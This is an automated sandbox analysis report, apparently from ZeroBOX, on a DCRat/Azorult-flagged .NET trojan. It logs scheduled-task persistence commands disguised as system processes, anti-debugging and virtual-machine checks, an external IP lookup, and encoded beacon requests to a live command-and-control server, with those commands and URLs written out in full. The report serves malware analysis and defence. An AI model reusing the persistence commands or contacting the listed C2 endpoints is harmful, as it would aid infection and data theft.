Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6401	March 17, 2021, 11:03 p.m.	March 17, 2021, 11:05 p.m.

Size	1.0MB
Type	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
MD5	`a16225aa2cb7f0c1c4f975bb7a9eede0`
SHA256	`88056d251eaa713c922d375e82c3ac2f1daccff6dc13f1a5b02e091bf698bbbd`
CRC32	`2FB4AE5E`
ssdeep	`12288:5dmgyyU6Syny3y7c1WqMbaONry5UbXYoNe8gKzUjc1bdQHEQp:2gysLGyCWqMbde5IXg2b`
Yara	PE_Header_Zero - PE File Signature Zero IsPE32 - (no description) IsNET_EXE - (no description) IsWindowsGUI - (no description) IsPacked - Entropy Check Win32_Trojan_PWS_Azorult_Net_1_Zero - Win32 Trojan PWS .NET Azorult

dcrat.exe "C:\Users\test22\AppData\Local\Temp\dcrat.exe"
1908
- dcrat.exe "{path}"
  1940
  - schtasks.exe "schtasks" /create /tn "SearchIndexer" /sc ONLOGON /tr "'C:\MSOCache\All Users\{90120000-002A-0412-1000-0000000FF1CE}-C\SearchIndexer.exe'" /rl HIGHEST /f
    2612
  - schtasks.exe "schtasks" /create /tn "taskhost" /sc ONLOGON /tr "'C:\util\ProcessMonitor\taskhost.exe'" /rl HIGHEST /f
    1824
  - schtasks.exe "schtasks" /create /tn "audiodg" /sc ONLOGON /tr "'C:\Sandbox\test22\DefaultBox\user\current\audiodg.exe'" /rl HIGHEST /f
    1304
  - schtasks.exe "schtasks" /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Python27\Tools\i18n\WmiPrvSE.exe'" /rl HIGHEST /f
    192
  - schtasks.exe "schtasks" /create /tn "SearchProtocolHost" /sc ONLOGON /tr "'C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe'" /rl HIGHEST /f
    2932
  - SearchProtocolHost.exe "C:\Recovery\ab7d780a-0706-11e8-9512-b992fd7a33be\SearchProtocolHost.exe"
    1812
    - SearchProtocolHost.exe "{path}"
      2164

Name	Response	Post-Analysis Lookup
cd03477.tmweb.ru	A 5.23.51.195	5.23.51.195
ipinfo.io	A 216.239.34.21 A 216.239.36.21 A 216.239.38.21 A 216.239.32.21	216.239.38.21

IP Address	Status	Action
125.212.217.197	Active	Moloch
164.124.101.2	Active	Moloch
216.239.34.21	Active	Moloch
5.23.51.195	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 125.212.217.197:443 -> 192.168.56.101:49233	2522152	ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 153	Misc Attack
TCP 192.168.56.101:49224 -> 216.239.34.21:443	2025331	ET POLICY Possible External IP Lookup Domain Observed in SNI (ipinfo. io)	Device Retrieving External IP Address Detected
TCP 192.168.56.101:49224 -> 216.239.34.21:443	906200022	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 216.239.34.21:443 -> 192.168.56.101:49224	2025330	ET POLICY Possible External IP Lookup SSL Cert Observed (ipinfo.io)	Device Retrieving External IP Address Detected

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLS 1.2 192.168.56.101:49224 216.239.34.21:443	C=US, O=Google Trust Services, CN=GTS CA 1D2	CN=ipinfo.io	88:8c:1e:db:f7:41:3c:57:35:92:01:09:c7:62:42:1b:d1:76:5a:2c

Queries for the computername (30 events)

Time & API	Arguments	Status	Return
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:04 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW March 17, 2021, 11:05 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (8 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent March 17, 2021, 11:03 p.m.			0	0
IsDebuggerPresent March 17, 2021, 11:03 p.m.			0	0
IsDebuggerPresent March 17, 2021, 11:04 p.m.			0	0
IsDebuggerPresent March 17, 2021, 11:04 p.m.			0	0
IsDebuggerPresent March 17, 2021, 11:04 p.m.			0	0
IsDebuggerPresent March 17, 2021, 11:04 p.m.			0	0
IsDebuggerPresent March 17, 2021, 11:05 p.m.			0	0
IsDebuggerPresent March 17, 2021, 11:05 p.m.			0	0

Command line console output was observed (5 events)

Time & API	Arguments	Status	Return
WriteConsoleW March 17, 2021, 11:04 p.m.	buffer: SUCCESS: The scheduled task "SearchIndexer" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 17, 2021, 11:04 p.m.	buffer: SUCCESS: The scheduled task "taskhost" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 17, 2021, 11:04 p.m.	buffer: SUCCESS: The scheduled task "audiodg" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 17, 2021, 11:04 p.m.	buffer: SUCCESS: The scheduled task "WmiPrvSE" has successfully been created. console_handle: 0x00000007	1	1
WriteConsoleW March 17, 2021, 11:04 p.m.	buffer: SUCCESS: The scheduled task "SearchProtocolHost" has successfully been created. console_handle: 0x00000007	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx March 17, 2021, 11:03 p.m.		1	1	0

One or more processes crashed (7 events)

Time & API	Arguments	Status
__exception__ March 17, 2021, 11:05 p.m.	stacktrace: 0x566e4d7 mscorlib+0x30c9ff @ 0x6ff4c9ff mscorlib+0x302367 @ 0x6ff42367 mscorlib+0x3022a6 @ 0x6ff422a6 mscorlib+0x302261 @ 0x6ff42261 mscorlib+0x30ca7c @ 0x6ff4ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x727e07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x727b7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x727b7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x727b7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x7274c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x727e0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7285a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b8 fc e7 68 89 45 c4 83 7d c4 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7030e79 registers.esp: 108786528 registers.edi: 108786588 registers.eax: 39147932 registers.ebp: 108786596 registers.edx: 39147932 registers.ebx: 37651568 registers.esi: 38551636 registers.ecx: 0	1
__exception__ March 17, 2021, 11:05 p.m.	stacktrace: 0x566e516 mscorlib+0x30c9ff @ 0x6ff4c9ff mscorlib+0x302367 @ 0x6ff42367 mscorlib+0x3022a6 @ 0x6ff422a6 mscorlib+0x302261 @ 0x6ff42261 mscorlib+0x30ca7c @ 0x6ff4ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x727e07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x727b7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x727b7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x727b7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x7274c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x727e0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7285a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b8 fb e7 68 89 45 c4 83 7d c4 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7030f79 registers.esp: 108786528 registers.edi: 108786588 registers.eax: 39149252 registers.ebp: 108786596 registers.edx: 39149252 registers.ebx: 37651568 registers.esi: 38551636 registers.ecx: 0	1
__exception__ March 17, 2021, 11:05 p.m.	stacktrace: 0x566e555 mscorlib+0x30c9ff @ 0x6ff4c9ff mscorlib+0x302367 @ 0x6ff42367 mscorlib+0x3022a6 @ 0x6ff422a6 mscorlib+0x302261 @ 0x6ff42261 mscorlib+0x30ca7c @ 0x6ff4ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x727e07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x727b7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x727b7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x727b7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x7274c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x727e0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7285a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b8 fa e7 68 89 45 c4 83 7d c4 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7031079 registers.esp: 108786528 registers.edi: 108786588 registers.eax: 39158088 registers.ebp: 108786596 registers.edx: 39158088 registers.ebx: 37651568 registers.esi: 38551636 registers.ecx: 0	1
__exception__ March 17, 2021, 11:05 p.m.	stacktrace: 0x7031150 0x566e594 mscorlib+0x30c9ff @ 0x6ff4c9ff mscorlib+0x302367 @ 0x6ff42367 mscorlib+0x3022a6 @ 0x6ff422a6 mscorlib+0x302261 @ 0x6ff42261 mscorlib+0x30ca7c @ 0x6ff4ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x727e07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x727b7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x727b7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x727b7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x7274c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x727e0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7285a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b8 fa e7 68 89 45 c4 83 7d c4 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7031079 registers.esp: 108786392 registers.edi: 108786452 registers.eax: 39158088 registers.ebp: 108786460 registers.edx: 39158088 registers.ebx: 37651568 registers.esi: 38551636 registers.ecx: 0	1
__exception__ March 17, 2021, 11:05 p.m.	stacktrace: 0x703115e 0x566e594 mscorlib+0x30c9ff @ 0x6ff4c9ff mscorlib+0x302367 @ 0x6ff42367 mscorlib+0x3022a6 @ 0x6ff422a6 mscorlib+0x302261 @ 0x6ff42261 mscorlib+0x30ca7c @ 0x6ff4ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x727e07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x727b7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x727b7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x727b7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x7274c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x727e0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7285a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b8 fc e7 68 89 45 c4 83 7d c4 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7030e79 registers.esp: 108786392 registers.edi: 108786452 registers.eax: 39147932 registers.ebp: 108786460 registers.edx: 39147932 registers.ebx: 37651568 registers.esi: 38551636 registers.ecx: 0	1
__exception__ March 17, 2021, 11:05 p.m.	stacktrace: 0x7031510 0x566e5d3 mscorlib+0x30c9ff @ 0x6ff4c9ff mscorlib+0x302367 @ 0x6ff42367 mscorlib+0x3022a6 @ 0x6ff422a6 mscorlib+0x302261 @ 0x6ff42261 mscorlib+0x30ca7c @ 0x6ff4ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x727e07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x727b7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x727b7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x727b7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x7274c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x727e0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7285a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b8 fc e7 68 89 45 c4 83 7d c4 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7030e79 registers.esp: 108786408 registers.edi: 108786468 registers.eax: 39147932 registers.ebp: 108786476 registers.edx: 39147932 registers.ebx: 37651568 registers.esi: 38551636 registers.ecx: 0	1
__exception__ March 17, 2021, 11:05 p.m.	stacktrace: 0x645336d 0x566c34d 0x56696e7 mscorlib+0x30c9ff @ 0x6ff4c9ff mscorlib+0x302367 @ 0x6ff42367 mscorlib+0x3022a6 @ 0x6ff422a6 mscorlib+0x302261 @ 0x6ff42261 mscorlib+0x30ca7c @ 0x6ff4ca7c DllUnregisterServerInternal-0x7aa2 clr+0x2652 @ 0x72742652 DllRegisterServerInternal+0x243 CoUninitializeEE-0xd1f5 clr+0x1264f @ 0x7275264f DllRegisterServerInternal+0xa89 CoUninitializeEE-0xc9af clr+0x12e95 @ 0x72752e95 DllGetActivationFactoryImpl+0x3ff1 CreateApplicationContext-0x654b clr+0xa07d8 @ 0x727e07d8 LogHelp_TerminateOnAssert+0x920d GetPrivateContextsPerfCounters-0x10235 clr+0x77d4d @ 0x727b7d4d LogHelp_TerminateOnAssert+0x927b GetPrivateContextsPerfCounters-0x101c7 clr+0x77dbb @ 0x727b7dbb LogHelp_TerminateOnAssert+0x9348 GetPrivateContextsPerfCounters-0x100fa clr+0x77e88 @ 0x727b7e88 DllUnregisterServerInternal+0x22cb DllRegisterServerInternal-0x604d clr+0xc3bf @ 0x7274c3bf DllGetActivationFactoryImpl+0x3ead CreateApplicationContext-0x668f clr+0xa0694 @ 0x727e0694 DllGetClassObjectInternal+0x55056 CorDllMainForThunk-0x374a5 clr+0x11a0cf @ 0x7285a0cf BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x757333ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x773d9ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x773d9ea5 exception.instruction_r: 39 09 e8 b8 fc e7 68 89 45 c4 83 7d c4 00 74 1f exception.instruction: cmp dword ptr [ecx], ecx exception.exception_code: 0xc0000005 exception.symbol: exception.address: 0x7030e79 registers.esp: 110423140 registers.edi: 110423200 registers.eax: 39147932 registers.ebp: 110423208 registers.edx: 39147932 registers.ebx: 37651568 registers.esi: 37790296 registers.ecx: 0	1

One or more potentially interesting buffers were extracted, these generally contain injected code, configuration data, etc.

HTTP traffic contains suspicious features which may be indicative of malware related traffic (1 event)

suspicious_features

POST method with no referer header

suspicious_request

POST http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM

Performs some HTTP requests (15 events)

request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/0f7cfa505d7629e906ccb9e90828239c95f18bc4.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&c73c7e0fa085eeb4573982ce98a8b57d=ce93cd4e218354bd9ac289e36d11e3a8&4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/0f7cfa505d7629e906ccb9e90828239c95f18bc4.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&ae116bdcdc1f6290fbf402f17b2d5c25=717c6d64d7e49290451c54bb8530ea36&1a25c6857acc4f0f641ff2279925b4af=dbb1ff180da67a6c3d331bd83b86e444c638094f&4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&d80922c2849784bc1447d28a3c91306c=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&635e99668406b9d17dff5dd914abe03f=QTZ4UzN0gzY2cTZlJmZlZ2N1AzNhNWMhRTYkVWO5kTN&3e2cba95dc28875482e835607ed9c48a=9JicldWYuFWTg0WYyd2byBlI6IydvRmbpdFVDFkIs0nIoRXdhdmbpN3cp12Lc9Wau8mZulGcp9CXvwlOzBHd0hmI6ISZtRWYlJnIsICb19WZT9CXhl2cBJiOiUmbvpXZtlGdiwiI2gTMzAjI6ICbhR3cvBnIsISbvNWZsVGVgEWZy92SgYjN3QzUBJiOicmcvJCLiQDO3kjL2ITMsAjN2UjL3MjI6IyYvxmIsIiULJiOiknc05WdvNmIsICb19WZTJiOi42bpdWZyJCLiwWdvV2UiojI5RXajJCLiATNx4CNzEjL4AjMuUzNxIiOiAXaisnOi8mZulEcJJCLiIiOicUQUJCLiIjM0NXZ0JiOiUWbh5kclNXViwiIDBVLyIDVTVEViojIl1WYONEUiwiI0lmQgQjNg40SgwWYu9WazNXZm9mcQByNgM3dvRmbpdlI6IiclZlbpdlIsISWiojIulWbkF0cpJCLi4kI6ISbhNmYld1cpJCLiklI6ISZu9Gaw9mcjlWTzlmIsIyNuQjLzIiOiIXZWJXZ2JXZTJCLiMyQiojIlBXeUJXZ2JXZTJye&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=EjZ1AjZmBjYwMjZ5UzN1QjYiFmNlJTMjNjYlVWZmVzY
request	GET http://cd03477.tmweb.ru/s37gue3wcapintnq8aymsm4gxqthbf8ke/4xunxsulhh0vjwpro1yk0h20gz1osslxmtcnp352fd8u4inmyfrkt7qqfo5zvxwy/1qjf26r6i5eaf11049cwi97t4latqqpylcotv8zbuow2bxxg0lm7906kvfp0pnsg5nmc3x4ysz68otkbpj39nu/51afc5b336611bc72e86f878effc8f43.php?4np9zI4szio6ayvNH2RdxaGmV=mMK53KaJiq8UIEe720P8Sdd&wFII9dgDoHfri3pdfQQFPxtN90hQXW=JtNJxBRKEJ5qBi&Z8LvdBMYr9V5JI5QpRrV7Uu1b=GL6UGsoM&f3c39371923a2a97e8e2004599d6c568=gjMygjMyQ2MhdTNhdjN3IWNiJjNlJWMmR2NzMzY1gjMxMTO1QGO0cDM&cbed01b57bb84a42c95af8de36c27ba3=wYilDZ4AzM0ITNhN2YmF2YjFTMlVjZ1MjMzMDMkNDNlhTZkJmMiZzM&3e2cba95dc28875482e835607ed9c48a=%00&4b836cb6b63ff52e76cc353a8666a413=ETZ3ETYlZ2YyATOmRDMhF2YwkzMwgjNlJ2YwI2M2MDN&222849a66532f350bf8537e61aabb5b0=IGOkFmN4E2MlV2MhNGM5cDN3YGOwcDM3UzNlBDM3EWN
